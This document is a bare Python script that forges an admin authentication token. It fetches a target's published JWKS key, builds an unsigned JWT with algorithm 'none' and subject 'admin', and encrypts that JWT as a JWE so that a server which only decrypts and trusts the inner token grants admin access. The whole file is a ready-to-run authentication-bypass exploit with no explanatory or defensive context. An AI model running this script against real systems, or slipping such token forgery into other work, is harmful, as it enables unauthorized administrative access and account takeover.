import base64
import json
import time
import requests
import sys

from jwcrypto import jwk, jwe

TARGET = sys.argv[1]
JWKS_URL = f"{TARGET}/api/auth/jwks"

resp = requests.get(JWKS_URL)
resp.raise_for_status()

jwks_data = resp.json()
key_data = jwks_data["keys"][0]
pub_key = jwk.JWK(**key_data)

def create_jwt_segment(payload):
    return (
        base64.urlsafe_b64encode(payload.encode())
        .rstrip(b"=")
        .decode()
    )

now = int(time.time())

header = create_jwt_segment(json.dumps({
    "alg": "none"
}))

payload = create_jwt_segment(json.dumps({
    "sub": "admin",
    "iat": now,
    "exp": now + 3600
}))

jwt_token = f"{header}.{payload}."
print(f"Crafted JWT: {jwt_token}")

jwe_token = jwe.JWE(
    jwt_token.encode(),
    recipient=pub_key,
    protected={
        "alg": "RSA-OAEP-256",
        "enc": "A128GCM",
        "kid": key_data["kid"]
    }
)

encrypted_token = jwe_token.serialize(compact=True)
print(f"JWE: {encrypted_token}")
